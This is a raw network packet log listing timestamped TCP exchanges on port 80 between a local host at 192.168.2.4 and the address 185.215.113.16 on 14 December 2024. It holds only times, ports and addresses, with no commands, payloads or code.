Dec 14, 2024 12:56:23.630671978 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.630716085 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.630759954 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.634602070 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.634644985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.634715080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.634754896 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.638469934 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.638494968 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.638513088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.638545990 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.642168999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.642245054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.642379999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.642426968 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.645814896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.645930052 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.645971060 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.645971060 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.650039911 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.650104046 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.650109053 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.650149107 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.653507948 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.653685093 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.653809071 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.653867006 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.657526970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.657576084 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.657586098 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.657629013 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.661127090 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.661176920 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.661365032 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.661420107 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.665033102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.665179014 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.665235996 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.665235996 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.668644905 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.668704033 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.669264078 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.669307947 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.674319983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.674344063 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.674371958 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.674387932 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.676985025 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.677041054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.677203894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.677243948 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.680793047 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.680819035 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.680843115 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.680862904 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.685681105 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.685707092 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.685729980 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.685743093 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.688446999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.688461065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.688492060 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.688507080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.692361116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.692409039 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.692478895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.692517996 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.696866035 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.696929932 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.697031021 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.697079897 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.700932980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.700947046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.700972080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.700988054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.705454111 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.705465078 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.705501080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.705517054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.708241940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.708290100 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.783088923 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.783102036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.783139944 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.783159971 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.786566973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.786581039 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.786617994 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.786633968 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.787652016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.787664890 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.787694931 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.787708998 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.790654898 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.790698051 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.790836096 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.790874958 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.794024944 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.794071913 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.794194937 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.794233084 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.797257900 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.797300100 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.797456980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.797496080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.800462961 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.800476074 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.800506115 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.800530910 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.803998947 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.804013014 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.804052114 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.804065943 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.806375980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.806422949 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.806548119 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.806587934 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.809412956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.809456110 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.809619904 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.809662104 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.812454939 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.812501907 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.812629938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.812669039 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.815041065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.815080881 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.815232038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.815274000 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.817744970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.817787886 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.817924976 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.817966938 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.819825888 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.819874048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.820030928 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.820070028 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.822552919 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.822593927 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.822647095 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.822683096 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.826493979 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.826505899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.826545000 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.828501940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.828547001 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.828685045 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.828725100 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.831017971 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.831074953 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.831202984 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.831245899 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.833789110 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.833834887 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.833971977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.834012985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.836292982 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.836334944 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.836472988 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.836518049 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.839024067 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.839073896 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.839214087 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.839256048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.841464043 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.841507912 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.841646910 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.841686964 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.844008923 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.844054937 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.844178915 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.844218969 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.846575975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.846618891 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.846757889 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.846813917 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.849370956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.849381924 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.849416018 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.851875067 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.851886034 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.851917982 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.851933956 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.854438066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.854449034 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.854485035 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.856292963 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.856353045 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.856386900 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.856431961 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.858870983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.858918905 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.858964920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.859006882 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.861437082 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.861486912 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.861489058 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.861522913 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.864073038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.864120007 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.864270926 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.864315033 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.866576910 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.866625071 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.866741896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.866786003 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.869191885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.869240999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.869328976 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.869371891 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.872148037 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.872193098 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.872329950 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.872375011 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.874300957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.874346018 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.874414921 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.874455929 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.876940966 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.876991034 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.877155066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.877192974 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.879534960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.879576921 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.879667044 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.879712105 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.882059097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.882111073 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.882257938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.882302046 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.884670973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.884727001 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.884757996 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.884803057 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.887181997 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.887228966 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.887317896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.887362957 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.889755964 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.889811993 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.889858007 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.889911890 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.892417908 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.892462015 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.892486095 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.892525911 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.895061016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.895107031 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.895153999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.895198107 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.897452116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.897500038 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.897572994 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.897617102 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.900116920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.900191069 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.900367022 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.900419950 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.902776003 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.902833939 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.902916908 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.902965069 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.905204058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.905251980 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.905328989 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.905369043 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.907841921 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.907881021 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.907912970 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.907946110 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.910346031 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.910420895 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.910434008 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.910479069 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.912918091 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.912972927 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.912993908 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.913033962 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.918034077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.918049097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.918085098 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.918797970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.918849945 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.918972015 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.919013977 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.921195030 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.921242952 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.975328922 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.975383997 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.975508928 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.975552082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.975848913 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.975900888 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.976039886 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.976078987 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.977833986 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.977884054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.978039980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.978080988 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.979815960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.979875088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.979968071 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.980165005 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.981798887 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.981813908 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.981854916 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.981868982 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.983545065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.983586073 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.983733892 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.983772993 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.985521078 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.985563993 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.985707998 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.985743999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.987169981 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.987225056 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.987323046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.987370014 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.989123106 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.989164114 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.989183903 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.989219904 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.990900993 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.990928888 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.990947008 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.990978003 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.991964102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.992014885 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.992022038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.992074966 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.993714094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.993769884 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.993805885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.993846893 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.997129917 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.997184038 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.998020887 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.998078108 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.998519897 CET	80	49796	185.215.113.16	192.168.2.4
